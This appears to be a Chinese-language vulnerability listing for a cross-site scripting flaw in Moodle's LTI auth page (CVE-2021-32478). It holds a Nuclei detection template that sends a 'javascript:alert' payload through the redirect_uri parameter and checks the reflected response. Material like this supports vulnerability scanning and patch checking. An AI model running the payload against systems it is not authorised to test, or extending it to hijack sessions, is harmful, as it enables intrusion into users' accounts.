moodle-xss: Moodle - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Moodle | POC: 已公开

漏洞描述

Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, and earlier unsupported versions contain a cross-site scripting vulnerability via the redirect_uri parameter.

PoC代码[已公开]

id: moodle-xss

info:
  name: Moodle - Cross-Site Scripting
  author: hackergautam
  severity: medium
  description: Moodle 3.10 to 3.10.3, 3.9 to 3.9.6, 3.8 to 3.8.8, and earlier unsupported versions contain a cross-site scripting vulnerability via the redirect_uri parameter.
  reference:
    - https://twitter.com/JacksonHHax/status/1391367064154042377
    - https://nvd.nist.gov/vuln/detail/CVE-2021-32478
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    max-request: 1
  tags: moodle,xss,intrusive

http:
  - method: GET
    path:
      - "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{randstr}}'
          - '<form action="javascript:alert'
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "text/html"
# digest: 4b0a00483046022100a4242e3f4313ed1a0f8626cd330b2c9f53d6dda9d8e9154c08efd7bf72690c0f022100b3c7259016f4c437f85beedabb09e9f0a37d141da67521b7b697b45760c7e7a2:922c64590222798bb761d5b6d8e72950

相关漏洞推荐